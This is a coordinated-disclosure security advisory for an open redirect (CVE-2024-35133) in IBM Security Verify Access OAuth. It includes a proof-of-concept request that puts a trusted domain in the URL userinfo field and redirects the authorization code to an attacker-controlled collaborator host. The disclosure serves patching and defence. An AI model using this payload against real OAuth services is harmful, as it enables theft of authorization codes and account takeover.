<\/p>\n
- IBM Security Verify Access >= 10.0.0 ================================================
\n
\n 0. Overview
\n 1. Detailed Description
\n 2. Proof Of Concept
\n 3. Solution
\n 4. Disclosure Timeline
\n 5. References
\n 6. Credits
\n 7. Legal Notices
\n
\n======== ======================================================
\n
\n Revision:
\n 1.0
\n
\n Impact:
\n By persuading a victim to visit a specially crafted Web site, a remote
\n attacker could exploit this vulnerability to spoof the URL displayed
\n to redirect a user to a malicious Web site that would appear to be
\n trusted. This could allow the attacker to obtain highly sensitive
\n information or conduct further attacks against the victim.
\n
\n Severity:
\n NIST: High
\n IBM: Medium
\n
\n CVSS Score:
\n NIST 8.2 (CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:R\/S:C\/C:H\/I:L\/A:N)
\n IBM 6.8 (CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:C\/C:N\/I:H\/A:N)
\n
\n CVE-ID:
\n CVE-2024-35133
\n
\n Vendor:
\n IBM
\n
\n Affected Products:
\n IBM Security Verify Access
\n IBM Security Verify Access Docker
\n
\n Affected Versions:
\n 10.0.0 - 10.0.8
\n
\n Product Description:
\n
\n IBM Security Verify Access is a complete authorization and network
\n security policy management solution. It provides end-to-end protection
\n of resources over geographically dispersed intranets and extranets.
\n
\n In addition to state-of-the-art security policy management, IBM Security
\n Verify Access provides authentication, authorization, data security, and
\n centralized resource management capabilities.
\n
\n IBM Security Verify Access offers the following features:
\n Authentication ~ Provides a wide range of built-in authenticators and
\n supports external authenticators.
\n
\n Authorization ~ Provides permit and deny decisions for protected resources
\n requests in the secure domain through the authorization API.
\n
\n Data security and centralized resource management ~ Manages secure access
\n to private internal network-based resources by using the public Internet's
\n broad connectivity and ease of use with a corporate firewall system.
\n
\n======== ==========================================
\n
\n During a Penetration Test of the OAuth flow for a client, it was found an
\n Open Redirect vulnerability that can led to the leakage of the OAuth \"code\" variable.
\n
\n It was possible to bypass the parser's logic responsible for verifying the
\n correctness and the validity of the \"redirect_uri\" parameter during an OAuth
\n flow by leveraging RFC 3986 (3.2.1) providing a username and password directly
\n in the Uniform Resource Identifier (URI).
\n
\n By providing as the \"username\" field a legitimate and expected domain, it
\n was possible to bypass the whitelist filter used by \"IBM Security Verify Access\"
\n and cause an Open Redirect to any arbitrary domain controlled by the attacker,
\n not only altering the expected flow and redirect a user to a malicious
\n Web site that would appear to be trusted.
\n
\n This could allow the attacker to obtain highly sensitive like the OAuth \"code\"
\n token or conduct further attacks against the victim
\n
\n======== =============================================
\n
\n===== REQUEST =====
\n
\n[[
\n GET \/oauth\/oauth20\/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https:\/\/legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com\/[REDACTED]\/openid\/REDACTED\/[REDACTED]&scope=openid+ HTTP\/1.1
\n Host: [REDACTED]
\n User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0
\n Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8
\n Accept-Language: en-US,en;q=0.5
\n Accept-Encoding: gzip, deflate, br
\n Upgrade-Insecure-Requests: 1
\n Sec-Fetch-Dest: document
\n Sec-Fetch-Mode: navigate
\n Sec-Fetch-Site: same-origin
\n Sec-Fetch-User: ?1
\n Te: trailers
\n Connection: close
\n]]
\n
\n===== RESPONSE =====
\n
\n[[
\n HTTP\/1.1 302 Found
\n content-language: en-US
\n date: Tue, 19 Mar 2024 16:04:35 GMT
\n location: https:\/\/legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com\/[REDACTED]\/openid\/REDACTED\/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
\n p3p: CP=\"NON CUR OTPi OUR NOR UNI\"
\n x-frame-options: DENY
\n x-content-type-options: nosniff
\n cache-control: no-store
\n x-xss-protection: 1; mode=block
\n x-permitted-cross-domain-policies: none
\n cross-origin-resource-policy: same-site
\n content-security-policy: frame-ancestors 'none'
\n referrer-policy: no-referrer-when-downgrade
\n strict-transport-security: max-age=31536000; includeSubDomains
\n pragma: no-cache
\n Content-Length: 0.
\n]]
\n
\n======== ======================================================
\n
\n Refer to IBM Security Bulletin 7166712 for patch, upgrade or
\n suggested workaround information.
\n
\n See \"References\" for more details.
\n
\n======== ===========================================
\n
\n 19\/03\/2024 - Vulnerability discovered by the Security Researcher (Giulio Garzia)
\n 21\/03\/2024 - Vulnerability shared with the client who committed the
\n\t\tPenetration Test on his infrastructure, relying on IBM SVA
\n 02\/04\/2024 - Vulnerability shared with IBM
\n 02\/04\/2024 - Vulnerability taken over by IBM
\n 14\/05\/2024 - Vulnerability confirmed by IBM
\n 18\/07\/2024 - Pre-release provided by IBM to the customer to verify the
\n\t\tresolution of the vulnerability
\n 27\/08\/2024 - Security Bulletin and vulnerability shared by IBM
\n
\n======== ====================================================
\n
\n (1) https:\/\/www.ibm.com\/support\/pages\/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133
\n (2) https:\/\/exchange.xforce.ibmcloud.com\/vulnerabilities\/291026
\n (3) https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-35133
\n (4) https:\/\/cwe.mitre.org\/data\/definitions\/178.html
\n
\n======== =======================================================
\n
\n This vulnerability was discovered and reported by:
\n
\n Giulio Garzia 'Ozozuz'
\n
\n Contacts:
\n
\n https:\/\/www.linkedin.com\/in\/giuliogarzia\/
\n https:\/\/github.com\/Ozozuz
\n
\n======== ================================================
\n
\n Copyright (c) 2024 Giulio Garzia \"Ozozuz\"
\n
\n Permission is granted for the redistribution of this alert
\n electronically. It may not be edited in any way without mine express
\n written consent. If you wish to reprint the whole or any
\n part of this alert in any other medium other than electronically,
\n please email me for permission.
\n
\n Disclaimer: The information in the advisory is believed to be accurate
\n at the time of publishing based on currently available information.
\n Use of the information constitutes acceptance for use in an AS IS
\n condition.
\n There are no warranties with regard to this information. Neither the
\n author nor the publisher accepts any liability for any direct,
\n indirect, or consequential loss or damage arising from use of,
\n or reliance on,this information.\n <\/code><\/pre>\n<\/p><\/div>\n